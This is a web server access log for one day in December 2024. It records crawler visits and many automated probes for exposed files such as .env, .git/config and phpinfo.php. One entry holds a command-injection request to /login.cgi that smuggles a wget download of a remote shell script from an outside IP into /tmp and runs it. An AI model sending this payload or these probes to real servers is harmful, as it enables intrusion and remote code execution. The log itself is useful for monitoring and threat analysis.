156.59.198.135 - - [22/Dec/2024:01:05:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002071603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [22/Dec/2024:01:08:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [22/Dec/2024:01:22:59 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00018.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
37.139.5.66 - - [22/Dec/2024:01:25:02 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
13.64.193.6 - - [22/Dec/2024:01:39:13 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
95.214.55.74 - - [22/Dec/2024:01:44:44 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [22/Dec/2024:02:02:04 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image036.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.185.133.110 - - [22/Dec/2024:02:02:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [22/Dec/2024:02:06:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
154.213.187.122 - - [22/Dec/2024:02:15:06 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.136 - - [22/Dec/2024:02:16:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011181203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:02:20:42 +0100] "GET /renault.2web.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:02:24:43 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00009.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.112.187 - - [22/Dec/2024:02:26:55 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0"
156.59.198.136 - - [22/Dec/2024:02:28:43 +0100] "GET /renault.2web.at/stats/lang/awstats-hr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [22/Dec/2024:02:41:32 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
95.214.55.43 - - [22/Dec/2024:02:43:16 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.212.60.167 - - [22/Dec/2024:02:59:33 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [22/Dec/2024:03:12:28 +0100] "GET /renault.2web.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [22/Dec/2024:03:13:14 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.191.126.213 - - [22/Dec/2024:03:14:06 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Dec/2024:03:16:28 +0100] "GET /renault.2web.at/stats/lang/awstats-ar.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:03:20:28 +0100] "GET /renault.2web.at/stats/lang/awstats-id.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
52.183.224.68 - - [22/Dec/2024:03:22:24 +0100] "GET /manager/html HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [22/Dec/2024:03:28:15 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image050.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
139.59.7.221 - - [22/Dec/2024:03:37:42 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
139.59.7.221 - - [22/Dec/2024:03:37:43 +0100] "GET /activities.ico%22%20type=%22image/ico HTTP/1.1" 404 305 "-" "Go-http-client/1.1"
156.59.198.135 - - [22/Dec/2024:03:38:40 +0100] "GET /renault.2web.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:04:01:05 +0100] "GET /renault.2web.at/stats/lang/awstats-hu.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:04:05:04 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00001.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
184.105.247.196 - - [22/Dec/2024:04:05:46 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
184.105.247.196 - - [22/Dec/2024:04:07:35 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
184.105.247.196 - - [22/Dec/2024:04:08:22 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
156.59.198.135 - - [22/Dec/2024:04:09:05 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002201503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
184.105.247.196 - - [22/Dec/2024:04:09:06 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
184.105.247.196 - - [22/Dec/2024:04:09:09 +0100] "GET /phpinfo.php HTTP/1.1" 200 10245 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15"
184.105.247.196 - - [22/Dec/2024:04:09:11 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
156.59.198.136 - - [22/Dec/2024:04:13:05 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00016.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:04:17:05 +0100] "GET /renault.2web.at/stats/lang/awstats-cz.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:04:21:06 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00011.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
169.0.116.174 - - [22/Dec/2024:04:22:58 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.135 - - [22/Dec/2024:04:25:06 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00017.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.70.81.106 - - [22/Dec/2024:04:27:19 +0100] "GET /robots.txt HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
193.70.81.106 - - [22/Dec/2024:04:27:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.105.128.11 - - [22/Dec/2024:04:29:52 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.215.236.240 - - [22/Dec/2024:04:42:32 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-T819) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36"
156.59.198.136 - - [22/Dec/2024:04:50:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103180803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
89.248.174.186 - - [22/Dec/2024:04:52:01 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
45.33.109.8 - - [22/Dec/2024:04:59:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [22/Dec/2024:04:59:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.218.206.66 - - [22/Dec/2024:05:00:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [22/Dec/2024:05:00:31 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00019.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:05:04:31 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ro.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [22/Dec/2024:05:12:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
180.149.125.164 - - [22/Dec/2024:05:16:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
154.213.187.122 - - [22/Dec/2024:05:18:26 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.135 - - [22/Dec/2024:05:21:57 +0100] "GET /renault.2web.at/stats/lang/awstats-ko.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [22/Dec/2024:05:26:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.213.187.237 - - [22/Dec/2024:05:41:26 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.136 - - [22/Dec/2024:05:46:12 +0100] "GET /renault.2web.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:05:50:13 +0100] "GET /renault.2web.at/stats/lang/awstats-se.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:06:06:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105271303_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
44.220.185.51 - - [22/Dec/2024:06:25:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3040.77 Safari/537.32"
95.214.53.205 - - [22/Dec/2024:06:52:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.67 - - [22/Dec/2024:06:56:47 +0100] "\x16\x03\x01" 400 383 "-" "-"
198.235.24.67 - - [22/Dec/2024:06:56:47 +0100] "\x16\x03\x01" 400 383 "-" "-"
95.214.55.79 - - [22/Dec/2024:06:58:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Dec/2024:07:00:47 +0100] "GET /renault.2web.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:07:04:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:07:08:49 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image152.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:07:12:50 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00001.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.9 - - [22/Dec/2024:07:16:06 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
194.165.16.76 - - [22/Dec/2024:07:24:20 +0100] "\x03" 400 383 "-" "-"
59.126.188.50 - - [22/Dec/2024:07:45:05 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [22/Dec/2024:08:00:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001131103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:08:04:18 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray16a_bk.png HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.156.248.28 - - [22/Dec/2024:08:04:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Dec/2024:08:08:19 +0100] "GET /renault.2web.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.38 - - [22/Dec/2024:08:13:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [22/Dec/2024:08:18:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102010803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:08:41:48 +0100] "GET /docs/contadino/ANGEBOT/AG17-000003.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [22/Dec/2024:08:43:46 +0100] "GET /logon.htm HTTP/1.1" 404 350 "-" "Hello World"
87.120.115.119 - - [22/Dec/2024:08:49:23 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36"
156.59.198.135 - - [22/Dec/2024:08:56:33 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image038.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:09:02:05 +0100] "GET /renault.2web.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.79.181.223 - - [22/Dec/2024:09:03:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.136 - - [22/Dec/2024:09:10:05 +0100] "GET /docs/contadino/ANGEBOT/AG17-000004.pdf HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [22/Dec/2024:09:17:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.39.9 - - [22/Dec/2024:09:22:31 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Dec/2024:09:41:01 +0100] "GET /renault.2web.at/stats/lang/awstats-ba.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.213.187.122 - - [22/Dec/2024:09:44:06 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.135 - - [22/Dec/2024:10:07:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008251603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:10:19:04 +0100] "GET /renault.2web.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
63.141.246.226 - - [22/Dec/2024:10:22:09 +0100] "GET /nacos/v1/console/namespaces HTTP/1.1" 404 294 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [22/Dec/2024:10:23:04 +0100] "GET /docs/contadino/2017/GS17-000002.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:10:27:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001080903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.240 - - [22/Dec/2024:10:28:53 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 9; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
156.59.198.136 - - [22/Dec/2024:10:31:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202112011403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [22/Dec/2024:10:32:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.189.182.234 - - [22/Dec/2024:10:33:09 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
156.59.198.136 - - [22/Dec/2024:10:45:44 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00014.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.9 - - [22/Dec/2024:10:46:39 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Dec/2024:10:49:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101150903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:10:59:28 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray16b.png HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Dec/2024:11:03:28 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00015.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [22/Dec/2024:11:13:37 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [22/Dec/2024:11:25:25 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00008.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Dec/2024:11:29:26 +0100] "GET /renault.2web.at/stats/lang/awstats-bg.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [22/Dec/2024:11:38:48 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [22/Dec/2024:11:59:48 +0100] "GET /docs/contadino/2017/GS17-000005.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.244 - - [22/Dec/2024:11:59:51 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
92.255.57.58 - - [22/Dec/2024:12:01:43 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.214.53.205 - - [22/Dec/2024:12:05:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Dec/2024:12:11:50 +0100] "GET /docs/contadino/2018/RECHNUNG/RE18-00007.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
